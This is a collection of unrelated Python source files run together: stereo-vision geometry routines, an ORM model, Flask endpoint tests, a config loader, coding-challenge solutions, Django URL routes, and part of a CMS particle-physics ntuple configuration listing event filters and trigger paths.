        x, y = pts1[idx][0], pts1[idx][1]
        xp, yp = pts2[idx][0], pts2[idx][1]
        A[idx] = [xp * x, xp * y, xp, yp * x, yp * y, yp, x, y, 1]
    # The minimizer is the right singular vector belonging to the
    # smallest singular value of A^T A.
    _, _, Vt = svd(dot(A.T, A))
    return Vt[-1, :]
def condition_fundamental_matrix(F):
    '''
    Project F onto the nearest rank-2 matrix (zero the smallest singular
    value via SVD) and normalize so that F[2,2] == 1.
    '''
    U, singular, Vt = svd(F)
    singular[-1] = 0.
    conditioned = dot(U, dot(diag(singular), Vt))
    return conditioned / conditioned[-1, -1]
def get_normalization_homography_matrix():
    '''
    Find the homography matrix that transforms the given coordinates to zero-mean
    '''
    # TODO: unimplemented stub — currently returns None.
    # get_fundamental_matrix() calls it but discards the (missing) result.
    pass
def get_right_null_space(A, eps=1e-5):
    '''
    Return the right null-space vector(s) of a matrix as columns: the
    rows of V^T whose singular values are <= eps, transposed.
    '''
    _, singular_values, Vt = svd(A)
    near_zero = singular_values <= eps
    # compress() keeps only the rows of Vt flagged by the mask.
    basis_rows = compress(near_zero, Vt, axis=0)
    return basis_rows.T
def get_cross_product_equiv_matrix(w):
    '''
    Build the skew-symmetric matrix [w]_x such that dot([w]_x, u) == cross(w, u).
    '''
    wx, wy, wz = w[0], w[1], w[2]
    skew = zeros((3, 3))
    skew[0, 1], skew[0, 2] = -wz, wy
    skew[1, 0], skew[1, 2] = wz, -wx
    skew[2, 0], skew[2, 1] = -wy, wx
    return skew
def triangulate_point(P, Pp, pt1, pt2):
    '''
    Linear (DLT) triangulation: given one corresponding point on each
    image plane and the two camera matrices, return the homogeneous
    world coordinate normalized so its last component is 1.
    '''
    # Each image point contributes two linear constraints on the
    # homogeneous world point X (rows of A, so that A.X = 0).
    A = array([pt1[0] * P[2, :] - P[0, :],
               pt1[1] * P[2, :] - P[1, :],
               pt2[0] * Pp[2, :] - Pp[0, :],
               pt2[1] * Pp[2, :] - Pp[1, :]])
    # Minimizer: right singular vector of A^T A with the smallest
    # singular value.
    _, _, Vt = svd(dot(A.T, A))
    sol = Vt[-1, :]
    return sol / sol[-1]
def triangulate_points(P, Pp, pts1, pts2):
    '''
    Convenience wrapper: triangulate every corresponding pair from
    pts1/pts2 and return the resulting world points as a list.
    '''
    return [triangulate_point(P, Pp, left, right)
            for left, right in zip(pts1, pts2)]
def get_fundamental_matrix_from_projection(P, Pp):
    '''
    Extract F from the secondary camera projection matrix in canonical
    configuration: F = [e']_x * Pp * pinv(P), normalized so F[2,2] == 1.
    '''
    epipole = Pp[:, 3]
    skew = get_cross_product_equiv_matrix(epipole)
    pseudo_inv_P = dot(P.T, inv(dot(P, P.T)))
    F = dot(skew, dot(Pp, pseudo_inv_P))
    return F / F[-1, -1]
def nonlinear_optimization(pts1, pts2, P, Pp):
    '''
    Optimize the secondary camera matrix in canonical configuration.
    '''
    # Levenberg-Marquardt refinement of Pp: re-triangulate every match
    # with the candidate camera and minimize the reprojection residuals.
    # NOTE: this module is Python 2 (print statement below).
    nPts = len(pts1)
    # Measured coordinates as a 2 x (2*nPts) array: columns [0, nPts)
    # hold image-1 points, columns [nPts, 2*nPts) image-2 points.
    array_meas = hstack((array(pts1).T, array(pts2).T))
    array_reprj = zeros(array_meas.shape)
    p_guess = Pp.flatten()
    def error_function(p):
        '''
        Geometric distance as cost function for LevMar.
        '''
        # Rebuild the candidate camera from the flat parameter vector,
        # then fill the shared reprojection buffer (closed over above).
        Pp = p.reshape(3,4)
        array_reprj.fill(0.)
        for i in range(nPts):
            pt1, pt2 = pts1[i], pts2[i]
            pt_world = triangulate_point(P, Pp, pt1, pt2)
            pt1_reprj = dot(P, pt_world)
            pt1_reprj = pt1_reprj / pt1_reprj[-1]
            pt2_reprj = dot(Pp, pt_world)
            pt2_reprj = pt2_reprj / pt2_reprj[-1]
            array_reprj[:,i] = pt1_reprj[:2]
            array_reprj[:,i+nPts] = pt2_reprj[:2]
        error = array_meas - array_reprj
        return error.flatten()
    print "Optimizing..."
    p_refined, _ = leastsq(error_function, p_guess)
    Pp_refined = p_refined.reshape(3,4)
    # Normalize so the bottom-right entry is 1; P (canonical [I|0]) is
    # returned unchanged.
    Pp_refined = Pp_refined / Pp_refined[-1,-1]
    P_refined = P
    return P_refined, Pp_refined
def get_epipoles(F):
    '''
    Given the fundamental matrix, return the left and right epipole,
    each normalized so its last component is 1.
    '''
    left = get_right_null_space(F)
    assert left.shape[1] == 1, "More than one left epipoles have been found."
    right = get_right_null_space(F.T)
    assert right.shape[1] == 1, "More than one right epipoles have been found."
    return left / left[-1], right / right[-1]
def get_canonical_projection_matrices(F, ep):
    '''
    Given the fundamental matrix and the right-image epipole, build the
    canonical camera pair: P = [I | 0] and Pp = [[e']_x F | e'].
    '''
    P = hstack(( eye(3), zeros((3, 1)) ))
    skew = get_cross_product_equiv_matrix(ep)
    Pp = hstack(( dot(skew, F), ep ))
    return P, Pp
def get_fundamental_matrix(pts1, pts2):
    '''
    Given point correspondences, make an initial linear estimate of the
    fundamental matrix F and condition it to rank 2.
    '''
    # NOTE: the normalization helper is an unimplemented stub whose
    # (missing) result is discarded here.
    get_normalization_homography_matrix()
    estimate = solve_homo_system_with_llsm(pts1, pts2).reshape(3, 3)
    return condition_fundamental_matrix(estimate)
def get_rectification_homographies(image1, image2, pts1, pts2, e, ep, P, Pp):
    '''
    Find the homography matrices that align the corresponding epipolar lines to the same row.
    '''
    # Hartley-style rectification: map the right epipole to infinity,
    # then solve a small least-squares system for the matching shear on
    # the first image.
    # NOTE(review): image1 and e are unused; kept for a symmetric signature.
    # Start with the second image first
    h2, w2 = image2.shape[0], image2.shape[1]
    # Translational matrix that shifts the image to be origin-centered
    T1 = array([[1., 0., -w2/2.],
                [0., 1., -h2/2.],
                [0., 0., 1.]])
    # Rotational matrix that rotates the epipole onto x-axis
    theta = arctan( (ep[1] - h2/2.) / (ep[0] - w2/2.) )
    # Since we want to rotate to positive x-axis
    theta = -theta[0]
    R = array([[cos(theta), -sin(theta), 0.],
               [sin(theta), cos(theta), 0.],
               [0., 0., 1.]])
    # Homography that takes epipole to infinity
    f = norm(array([ep[1] - h2/2., ep[0] - w2/2.]))
    G = array([[1., 0., 0.],
               [0., 1., 0.],
               [-1./f, 0., 1.]])
    # Translate back to original center
    T2 = array([[1., 0., w2/2.],
                [0., 1., h2/2.],
                [0., 0., 1.]])
    # The final homography for the second image
    Hp = dot( T2, dot( G, dot(R, T1) ) )
    ####
    # Now the first image
    M = dot( Pp, dot( P.T, inv( dot(P, P.T) ) ) )
    H0 = dot( Hp, M )
    pts1h = apply_transformation_on_points(pts1, H0)
    pts2h = apply_transformation_on_points(pts2, Hp)
    # Construct inhomogeneous system
    n = len(pts1)
    A = zeros((n,3))
    b = zeros((n,1))
    for i in range(n):
        xh,yh = pts1h[i][0], pts1h[i][1]
        xph = pts2h[i][0]
        A[i] = [xh, yh, 1.]
        b[i] = xph
    # h is pseudo-inverse multiplied by b
    h = dot( dot( inv( dot(A.T, A) ), A.T ), b )
    h = h.flatten()
    # Obtain the homography for the first image
    HA = array([[h[0], h[1], h[2]],
                [0., 1., 0.],
                [0., 0., 1.]])
    H = dot(HA, H0)
    return H, Hp
from sqlalchemy import Column, Integer, String
from config import Base
class Book(Base):
    """SQLAlchemy ORM model mapped to the 'book' table."""
    __tablename__ ="book"
    # Surrogate primary key, indexed for fast lookups.
    id = Column(Integer, primary_key=True, index=True)
    title = Column(String)
    description = Column(String)
import datetime
from unittest.mock import ANY, patch
from flask import Flask
from src.api.v1.users import UserTrackListenCountsMonthly
# Minimal Flask app used only to provide a request context for the tests.
app = Flask(__name__)
# Bypasses the @marshal_with decorator
app.config["RESTX_MASK_HEADER"] = "*"
# Query-string window shared by the tests in this module.
START_TIME = "2020-01-01"
END_TIME = "2021-01-01"
# Decorators are applied bottom-up, so the mock arguments arrive in
# reverse order: decoder first, then success_response, then the query.
@patch(
    "src.api.v1.users.get_user_listen_counts_monthly",
    return_value=[
        {"play_item_id": 4, "timestamp": datetime.date(2022, 2, 1), "count": 10},
        {"play_item_id": 1, "timestamp": datetime.date(2022, 1, 1), "count": 7},
        {"play_item_id": 5, "timestamp": datetime.date(2022, 2, 1), "count": 8},
    ],
)
@patch(
    "src.api.v1.users.success_response",
    # Cache decorator expects a tuple response
    side_effect=(lambda input: ({"data": input}, 200)),
)
@patch("src.api.v1.users.decode_with_abort", return_value=3)
def test_user_listen_counts_monthly_get_formats_correctly(
    mock_decoder, mock_success_response, mock_get_user_listen_counts_monthly
):
    """Endpoint groups raw play rows by month, sums totalListens and
    renders dates in the "...T00:00:00 Z" key format."""
    expected_formatted_listen_counts = {
        "2022-02-01T00:00:00 Z": {
            "totalListens": 18,
            "trackIds": [4, 5],
            "listenCounts": [
                {
                    "trackId": 4,
                    "date": "2022-02-01T00:00:00 Z",
                    "listens": 10,
                },
                {
                    "trackId": 5,
                    "date": "2022-02-01T00:00:00 Z",
                    "listens": 8,
                },
            ],
        },
        "2022-01-01T00:00:00 Z": {
            "totalListens": 7,
            "trackIds": [1],
            "listenCounts": [
                {
                    "trackId": 1,
                    "date": "2022-01-01T00:00:00 Z",
                    "listens": 7,
                }
            ],
        },
    }
    with app.test_request_context(
        "/users/3jk4l/listen_counts_monthly",
        method="GET",
        data={"start_time": START_TIME, "end_time": END_TIME},
    ):
        assert UserTrackListenCountsMonthly().get("3jk4l") == (
            {"data": expected_formatted_listen_counts},
            200,
            # Redis metrics add this empty dict
            {},
        )
        mock_decoder.assert_called_once_with("3jk4l", ANY)
        mock_get_user_listen_counts_monthly.assert_called_once_with(
            {
                "user_id": 3,
                "start_time": START_TIME,
                "end_time": END_TIME,
            }
        )
        mock_success_response.assert_called_once_with(expected_formatted_listen_counts)
@patch("src.api.v1.users.get_user_listen_counts_monthly", return_value=[])
@patch(
    "src.api.v1.users.success_response",
    # Cache decorator expects a tuple response
    side_effect=(lambda input: ({"data": input}, 200)),
)
@patch("src.api.v1.users.decode_with_abort", return_value=5)
def test_user_listen_counts_monthly_get_no_data(
    mock_decoder, mock_success_response, mock_get_user_listen_counts_monthly
):
    """When the query yields no rows, the endpoint returns an empty dict
    payload with a 200 status."""
    with app.test_request_context(
        "/users/feafda/listen_counts_monthly",
        method="GET",
        data={"start_time": START_TIME, "end_time": END_TIME},
    ):
        data = UserTrackListenCountsMonthly().get("feafda")
        assert data == (
            {"data": {}},
            200,
            # Redis metrics add this empty dict
            {},
        )
        mock_decoder.assert_called_once_with("feafda", ANY)
        mock_get_user_listen_counts_monthly.assert_called_once_with(
            {
                "user_id": 5,
                "start_time": START_TIME,
                "end_time": END_TIME,
            }
        )
        mock_success_response.assert_called_once_with({})
|
"""
create by 2020-10-28 author hf
"""
import yaml, os
from common.log import Logger
# Module-wide logger used for config-loading diagnostics below.
logger = Logger(name="envconfig")
class GetConfig:
    """Load per-environment test data from data/<project>/<data>.yaml."""

    @classmethod
    def get_project_config(cls, project="idea", data="idea", env="test"):
        """Return the section of the YAML file that matches *env*.

        env == "test"  -> the "test" section
        env == "env"   -> the "env" section
        anything else  -> the "prodect" section (sic — key kept as-is so
                          existing YAML files keep working)
        """
        # os.path.join makes this portable; the previous hard-coded "\\"
        # separators only worked on Windows.
        base_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
        path = os.path.join(base_dir, "data", project, "{}.yaml".format(data))
        logger.debug(path)
        # `with` guarantees the handle is closed (the old code leaked the
        # file object passed straight to yaml.safe_load()).
        with open(path, encoding='utf-8') as fh:
            result = yaml.safe_load(fh)
        logger.debug(result)
        if env == "test":
            return result.get("test")
        if env == "env":
            return result.get("env")
        return result.get("prodect")


if __name__ == '__main__':
    GetConfig.get_project_config(env="test", project="idea", data="data")
|
#!/bin/python3
# https://www.hackerrank.com/challenges/append-and-delete/
import sys
def can_convert(s, t, k):
    """Return True when *s* can be turned into *t* using exactly *k*
    operations, where each operation deletes the last character of the
    working string (a no-op on the empty string) or appends a character.

    Keep the longest common prefix; deleting the rest of s and appending
    the rest of t costs `needed` operations.  Any surplus must be burnt
    in delete+append pairs (even surplus), unless k is large enough to
    wipe the whole string — then empty-string deletes absorb any parity.

    The previous inline logic got the parity wrong (e.g. s == t == "ab"
    with k == 1 answered "Yes"; the correct answer is "No").
    """
    common = 0
    for a, b in zip(s, t):
        if a != b:
            break
        common += 1
    needed = (len(s) - common) + (len(t) - common)
    if k >= len(s) + len(t):
        return True  # delete everything (extra deletes are no-ops), rebuild t
    return k >= needed and (k - needed) % 2 == 0


if __name__ == '__main__':
    # Same stdin/stdout contract as before: read s, t, k; print Yes/No.
    s = input().strip()
    t = input().strip()
    k = int(input().strip())
    print('Yes' if can_convert(s, t, k) else 'No')
from django.conf.urls import include, url
from django.urls import path
from . import views
# URL routes for the fanatics/ticketing views; each `name` is the key
# used for reverse() lookups in templates and redirects.
urlpatterns = [
    path('', views.home, name='home'),
    path('fanatics/',views.fanatics, name='fanatics'),
    # Detail view takes the fanatic's integer primary key in the path.
    path('fanaticsDetail/<int:id>',views.fanaticsDetail,name='fanaticsDetail'),
    path('fanaticsDates/',views.fanaticsDates,name='fanaticsDates'),
    path('reports/',views.reports,name='reports'),
    path('palcos/',views.palcos,name='palcos'),
    path('palcosSearch/',views.palcosSearch,name='palcosSearch'),
    path('PalcoFanatic/',views.palcoFanatics,name='palcoFanatic'),
    path('seat/',views.Seat,name='seat'),
    path('seatOrderCategories/',views.seatOrderCategories,name='seatOrderCategories'),
]
#https://leetcode.com/problems/two-sum-ii-input-array-is-sorted/
def twoSum(numbers,target):
    """Two-pointer solution for the sorted-array variant: return the
    1-based indices of the pair summing to target (None if absent).
    NOTE: shadowed by the second twoSum defined right below."""
    lo, hi = 0, len(numbers) - 1
    while lo < hi:
        total = numbers[lo] + numbers[hi]
        if total < target:
            lo += 1          # need a bigger sum
        elif total > target:
            hi -= 1          # need a smaller sum
        else:
            return [lo + 1, hi + 1]
def twoSum(numbers, target):
    """Hash-map solution (works even for unsorted input): return the
    1-based indices of the pair summing to target (None if absent).
    NOTE: this definition shadows the two-pointer twoSum above."""
    seen = {}
    for idx, value in enumerate(numbers):
        complement = target - value
        if complement in seen:
            return [seen[complement] + 1, idx + 1]
        seen[value] = idx
|
### *****************************************************************************************
### Usage:
###
### cmsRun B2GEdmtExtraToTTreeNtuple_cfg.py maxEvts=N sample="file:sample.root" ttreeOutputLabel="myoutput.root"
###
### Default values for the options are set:
### maxEvts = -1
### sample = 'file:B2GEDMNtupleExtra.root'
### ttreeOutputLabel = 'B2GTTreeNtuple.root'
### *****************************************************************************************
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as opts
import os
useMINIAOD = True # True: Use on top of B2GAnaFW to produce TTrees, False: Use already produced B2G Edm ntuple')
if useMINIAOD:
    # Build the full B2G EDM ntuple in-process and tighten the electron
    # skim cut plus the Spring15 cut-based ID value maps.
    from Analysis.B2GTTrees.b2gedmntuples_cfg import *
    process.endPath = cms.EndPath()
    process.skimmedPatElectrons.cut = "pt >= 5 && abs(eta) < 2.5"
    process.electronUserData.eleVetoIdFullInfoMap = cms.InputTag("egmGsfElectronIDs:cutBasedElectronID-Spring15-25ns-V1-standalone-veto")
    process.electronUserData.eleLooseIdFullInfoMap = cms.InputTag("egmGsfElectronIDs:cutBasedElectronID-Spring15-25ns-V1-standalone-loose")
    process.electronUserData.eleMediumIdFullInfoMap = cms.InputTag("egmGsfElectronIDs:cutBasedElectronID-Spring15-25ns-V1-standalone-medium")
    process.electronUserData.eleTightIdFullInfoMap = cms.InputTag("egmGsfElectronIDs:cutBasedElectronID-Spring15-25ns-V1-standalone-tight")
    setupAllVIDIdsInModule(process,'RecoEgamma.ElectronIdentification.Identification.cutBasedElectronID_Spring15_25ns_V1_cff',setupVIDElectronSelection)
else:
    # Run on an already-produced EDM ntuple: create a fresh bare process.
    process = cms.Process("b2gAnalysisTTrees")
    process.load("FWCore.MessageService.MessageLogger_cfi")
    process.MessageLogger.categories.append('HLTrigReport')
    process.MessageLogger.cerr.FwkReport.reportEvery = 1000
    #process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')
    #if options.globalTag != '':
    #    process.GlobalTag.globaltag = options.globalTag
    #else:
    #    from Configuration.AlCa.GlobalTag import GlobalTag as customiseGlobalTag
    #    process.GlobalTag = customiseGlobalTag(process.GlobalTag, globaltag = 'auto:run2_mc')
    #    print "Automatically selected GlobalTag: "+str(process.GlobalTag.globaltag)
# Command-line options; parsed at the bottom with options.parseArguments().
options = opts.VarParsing('analysis')
options.register('sample',
                 'file:B2GEDMNtuple.root',
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.string,
                 'Sample to analyze')
options.register('outputLabel',
                 'B2GTTreeNtupleExtra.root',
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.string,
                 'Output label')
options.register('isData',
                 True,
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.bool,
                 'Is data?')
options.register('isFastSim',
                 False,
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.bool,
                 'Is FastSim?')
#options.register('globalTag',
#                 '',
#                 opts.VarParsing.multiplicity.singleton,
#                 opts.VarParsing.varType.string,
#                 'GlobalTag (empty = auto)')
options.register('xsec',
                 0,# default value: 0
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.float,
                 'Cross section (with k-factor applied, in units of pb)')
options.register('Era',
                 'Spring16_25nsV6',
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.string,
                 'Directory, where the JEC text files are lcoated')
options.register('usePrivateSQLite',
                 False,
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.bool,
                 'Take Corrections from private SQL file')
options.register('runOnGrid',
                 True,
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.bool,
                 'Specify whether you are running on grid, for private test set to False')
options.register('lheLabel',
                 "",
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.string,
                 'LHE module label, MC sample specific. Can be: externalLHEProducer')
options.register('genHtFilter',
                 False,
                 opts.VarParsing.multiplicity.singleton,
                 opts.VarParsing.varType.bool,
                 'Specify whether you want to add a gen-level HT Filter (for unbinned TTJets sample)')
options.parseArguments()
### Output Report
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(False) )
### Number of maximum events to process
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(options.maxEvents) )
### Source file
process.source = cms.Source("PoolSource",
    fileNames = cms.untracked.vstring(options.sample)
)
# TTree code specific options
ttreeOutputLabel = options.outputLabel
isData = ("Data" in options.DataProcessing) if useMINIAOD else options.isData
isFastSim = ("FastSim" in options.DataProcessing) if useMINIAOD else options.isFastSim
# NOTE(review): these two hard-coded values override the 'runOnGrid' and
# 'usePrivateSQLite' command-line options registered above — confirm intended.
runOnGrid = True
usePrivateSQLite = False
if useMINIAOD:
    Era = ""
    if options.usePrivateSQLite:
        usePrivateSQLite = True
        Era = jec_era
else:
    Era = options.Era + ("_DATA" if isData else "_MC")
JECloc = Era if runOnGrid else os.environ['CMSSW_BASE']+'/src/Analysis/B2GAnaFW/test/'+Era
# NOTE(review): fixed value; the registered 'lheLabel'/'genHtFilter'
# options are not consulted here — confirm intended.
lheLabel = "externalLHEProducer"
genHtFilter = False
### Output file
process.TFileService = cms.Service("TFileService", fileName = cms.string(ttreeOutputLabel))
### B2GEdmExtraVarProducer
from Analysis.B2GAnaFW.b2gedmntuples_cff import metFull, metFullClean, puppimetFull, genPart, electrons, muons, photons, photonjets, jetsAK4CHS, jetsAK4Puppi, jetsAK8CHS, jetsAK8Puppi, subjetsAK8CHS, subjetsAK8Puppi, genJetsAK8, genJetsAK8SoftDrop, eventInfo # metNoHF off since 76X
# import DB content from sqlite
if usePrivateSQLite and not useMINIAOD:
    from CondCore.DBCommon.CondDBSetup_cfi import *
    # Local JEC payloads: one record per jet collection, all read from
    # the <Era>.db sqlite file located at JECloc.
    process.jec = cms.ESSource("PoolDBESSource",CondDBSetup,
        connect = cms.string( "sqlite_file:"+JECloc+".db" ),
        toGet = cms.VPSet(
            cms.PSet(
                record = cms.string("JetCorrectionsRecord"),
                tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK4PF"),
                label= cms.untracked.string("AK4PF")
            ),
            cms.PSet(
                record = cms.string("JetCorrectionsRecord"),
                tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK4PFchs"),
                label= cms.untracked.string("AK4PFchs")
            ),
            cms.PSet(
                record = cms.string("JetCorrectionsRecord"),
                tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK4PFPuppi"),
                label= cms.untracked.string("AK4PFPuppi")
            ),
            cms.PSet(
                record = cms.string("JetCorrectionsRecord"),
                tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK8PF"),
                label= cms.untracked.string("AK8PF")
            ),
            cms.PSet(
                record = cms.string("JetCorrectionsRecord"),
                tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK8PFchs"),
                label= cms.untracked.string("AK8PFchs")
            ),
            cms.PSet(
                record = cms.string("JetCorrectionsRecord"),
                tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK8PFPuppi"),
                label= cms.untracked.string("AK8PFPuppi")
            ),
        )
    )
    # Prefer the local sqlite JEC payloads over those in the GlobalTag.
    process.es_prefer_jec = cms.ESPrefer("PoolDBESSource",'jec')
# Revert back to CHS - 22 December 2016
# Select which jet/MET collections feed the extra-variable producer;
# the *_label/*_prefix/*_key values below are looked up by name.
usePuppiJets = False # Also make sure B2GTTreeMaker_cff.py is consistent
usePuppiMet = False # Used for Razor calculation
if usePuppiJets:
    AK4_label = "jetsAK4Puppi"
    AK4_prefix = "jetAK4Puppi"
    AK4_key = "jetKeysAK4Puppi"
    AK8_label = "jetsAK8Puppi"
    AK8_prefix = "jetAK8Puppi"
    AK8_key = "jetKeysAK8Puppi"
    AK8sub_label = "subjetsAK8Puppi"
    AK8sub_prefix = "subjetAK8Puppi"
    AK8sub_key = "subjetKeysAK8Puppi"
else:
    AK4_label = "jetsAK4CHS"
    AK4_prefix = "jetAK4CHS"
    AK4_key = "jetKeysAK4CHS"
    AK8_label = "jetsAK8CHS"
    AK8_prefix = "jetAK8CHS"
    AK8_key = "jetKeysAK8CHS"
    AK8sub_label = "subjetsAK8CHS"
    AK8sub_prefix = "subjetAK8CHS"
    AK8sub_key = "subjetKeysAK8CHS"
if usePuppiMet:
    met_label = "puppimetFull"
    met_prefix = puppimetFull.prefix
else:
    met_label = "metFullClean"
    met_prefix = metFullClean.prefix
process.extraVar = cms.EDProducer("B2GEdmExtraVarProducer",
isData = cms.untracked.bool(isData),
isFastSim = cms.untracked.bool(isFastSim),
lhe_label = cms.untracked.string(lheLabel),
filter_label = cms.untracked.string("METUserData"),
trigger_label = cms.untracked.string("TriggerUserData"),
evt_label = cms.untracked.string("eventUserData"),
evt_prefix = cms.untracked.string(""),
vtx_label = cms.untracked.string("vertexInfo"),
vtx_prefix = cms.untracked.string(""),
met_label = cms.untracked.string(met_label),
met_prefix = met_prefix,
gen_label = cms.untracked.string("genPart"),
gen_prefix = genPart.prefix,
electrons_label = cms.untracked.string("electrons"),
electrons_prefix = electrons.prefix,
muons_label = cms.untracked.string("muons"),
muons_prefix = muons.prefix,
AK4Jets_label = cms.untracked.string(AK4_label),
AK4Jets_prefix = cms.untracked.string(AK4_prefix),
AK4JetKeys_label = cms.untracked.string(AK4_key),
AK8Jets_label = cms.untracked.string(AK8_label),
AK8Jets_prefix = cms.untracked.string(AK8_prefix),
AK8JetKeys_label = cms.untracked.string(AK8_key),
AK8Subjets_label = cms.untracked.string(AK8sub_label),
AK8Subjets_prefix = cms.untracked.string(AK8sub_prefix),
AK8SubjetKeys_label = cms.untracked.string(AK8sub_key),
singleI = cms.untracked.vstring(
# Event filters (these are automatically picked up)
"Flag_HBHENoiseFilter",
"Flag_HBHENoiseIsoFilter",
"Flag_CSCTightHaloFilter",
"Flag_CSCTightHaloTrkMuUnvetoFilter",
"Flag_CSCTightHalo2015Filter",
"Flag_globalTightHalo2016Filter",
"Flag_globalSuperTightHalo2016Filter",
"Flag_HcalStripHaloFilter",
"Flag_hcalLaserEventFilter",
"Flag_EcalDeadCellTriggerPrimitiveFilter",
"Flag_EcalDeadCellBoundaryEnergyFilter",
"Flag_goodVertices",
"Flag_eeBadScFilter",
"Flag_ecalLaserCorrFilter",
"Flag_trkPOGFilters",
"Flag_chargedHadronTrackResolutionFilter",
"Flag_muonBadTrackFilter",
"Flag_trkPOG_manystripclus53X",
"Flag_trkPOG_toomanystripclus53X",
"Flag_trkPOG_logErrorTooManyClusters",
"Flag_METFilters",
"Flag_badMuons",
"Flag_duplicateMuons",
"Flag_noBadMuons",
# Add trigger names below (these are automatically picked up)
# Photon
"HLT_Photon175",
# Single Jet
# "HLT_PFJet40",
# "HLT_PFJet60",
# "HLT_PFJet80",
# "HLT_PFJet140",
# "HLT_PFJet200",
# "HLT_PFJet260",
# "HLT_PFJet320",
# "HLT_PFJet400",
# "HLT_PFJet450",
# "HLT_PFJet500",
# "HLT_AK8PFJet40",
# "HLT_AK8PFJet60",
# "HLT_AK8PFJet80",
# "HLT_AK8PFJet140",
# "HLT_AK8PFJet200",
# "HLT_AK8PFJet260",
# "HLT_AK8PFJet320",
# "HLT_AK8PFJet360_TrimMass30",
# "HLT_AK8PFJet400_TrimMass30",
# "HLT_AK8PFJet400",
# "HLT_AK8PFJet450",
# "HLT_AK8PFJet500",
# HT
# "HLT_PFHT125",
# "HLT_PFHT200",
# "HLT_PFHT250",
# "HLT_PFHT300",
# "HLT_PFHT350",
# "HLT_PFHT400",
# "HLT_PFHT475",
# "HLT_PFHT600",
# "HLT_PFHT650",
# "HLT_PFHT800",
# "HLT_PFHT900",
# "HLT_AK8PFHT650_TrimR0p1PT0p03Mass50",
# "HLT_AK8PFHT700_TrimR0p1PT0p03Mass50",
# "HLT_AK8PFHT750_TrimMass50",
# "HLT_AK8PFHT800_TrimMass50",
# "HLT_PFHT550_4JetPt50",
# "HLT_PFHT650_4JetPt50",
# "HLT_PFHT750_4JetPt50",
# "HLT_PFHT750_4JetPt70",
# "HLT_PFHT750_4JetPt80",
# "HLT_PFHT800_4JetPt50",
# "HLT_PFHT850_4JetPt50",
# 2 AK8 Jet
# "HLT_AK8DiPFJet250_200_TrimMass30",
# "HLT_AK8DiPFJet280_200_TrimMass30",
# "HLT_AK8DiPFJet300_200_TrimMass30",
# MET
# "HLT_MET100",
# "HLT_MET150",
# "HLT_MET200",
# "HLT_MET250",
# "HLT_MET300",
# "HLT_MET600",
# "HLT_MET700",
# "HLT_PFMET170_BeamHaloCleaned",
# "HLT_PFMET170_HBHECleaned",
# "HLT_PFMET170_HBHE_BeamHaloCleaned",
# "HLT_PFMET170_JetIdCleaned",
# "HLT_PFMET170_NoiseCleaned",
# "HLT_PFMET170_NotCleaned",
# "HLT_PFMETTypeOne190_HBHE_BeamHaloCleaned",
# "HLT_PFMET300",
# "HLT_PFMET400",
# "HLT_PFMET500",
# "HLT_PFMET600",
# MHT
# "HLT_CaloMHTNoPU90_PFMET90_PFMHT90_IDTight_BTagCSV_p067",
# "HLT_CaloMHTNoPU90_PFMET90_PFMHT90_IDTight",
# "HLT_PFMET100_PFMHT100_IDTight_BeamHaloCleaned",
# "HLT_PFMET100_PFMHT100_IDTight",
# "HLT_PFMET110_PFMHT110_IDTight",
# "HLT_PFMET120_PFMHT120_IDTight",
# "HLT_PFMET90_PFMHT90_IDTight",
# "HLT_PFMETNoMu100_PFMHTNoMu100_IDTight",
# "HLT_PFMETNoMu110_PFMHTNoMu110_IDTight",
# "HLT_PFMETNoMu120_PFMHTNoMu120_IDTight",
# "HLT_PFMETNoMu90_PFMHTNoMu90_IDTight",
# Single Mu
"HLT_Mu17",
"HLT_Mu20",
"HLT_Mu27",
"HLT_Mu50",
"HLT_Mu55",
"HLT_TkMu17",
"HLT_TkMu20",
"HLT_TkMu27",
"HLT_TkMu50",
"HLT_IsoMu18",
"HLT_IsoMu20",
"HLT_IsoMu22",
"HLT_IsoMu24",
"HLT_IsoMu27",
"HLT_IsoTkMu18",
"HLT_IsoTkMu20",
"HLT_IsoTkMu22",
"HLT_IsoTkMu24",
"HLT_IsoTkMu27",
# Single Ele
"HLT_Ele17_CaloIdL_GsfTrkIdVL",
"HLT_Ele22_eta2p1_WPLoose_Gsf",
"HLT_Ele23_WPLoose_Gsf",
"HLT_Ele24_eta2p1_WPLoose_Gsf",
"HLT_Ele25_WPTight_Gsf",
"HLT_Ele25_eta2p1_WPLoose_Gsf",
"HLT_Ele25_eta2p1_WPTight_Gsf",
"HLT_Ele27_WPLoose_Gsf",
"HLT_Ele27_WPTight_Gsf",
"HLT_Ele27_eta2p1_WPLoose_Gsf",
"HLT_Ele27_eta2p1_WPTight_Gsf",
"HLT_Ele30_WPTight_Gsf",
"HLT_Ele30_eta2p1_WPLoose_Gsf",
"HLT_Ele30_eta2p1_WPTight_Gsf",
"HLT_Ele32_WPTight_Gsf",
"HLT_Ele32_eta2p1_WPLoose_Gsf",
"HLT_Ele32_eta2p1_WPTight_Gsf",
"HLT_Ele35_WPLoose_Gsf",
"HLT_Ele45_WPLoose_Gsf",
"HLT_Ele105_CaloIdVT_GsfTrkIdT",
"HLT_Ele115_CaloIdVT_GsfTrkIdT",
"HLT_Ele145_CaloIdVT_GsfTrkIdT",
"HLT_Ele200_CaloIdVT_GsfTrkIdT",
"HLT_Ele250_CaloIdVT_GsfTrkIdT",
"HLT_Ele300_CaloIdVT_GsfTrkIdT",
#Lepton + 1 Jet
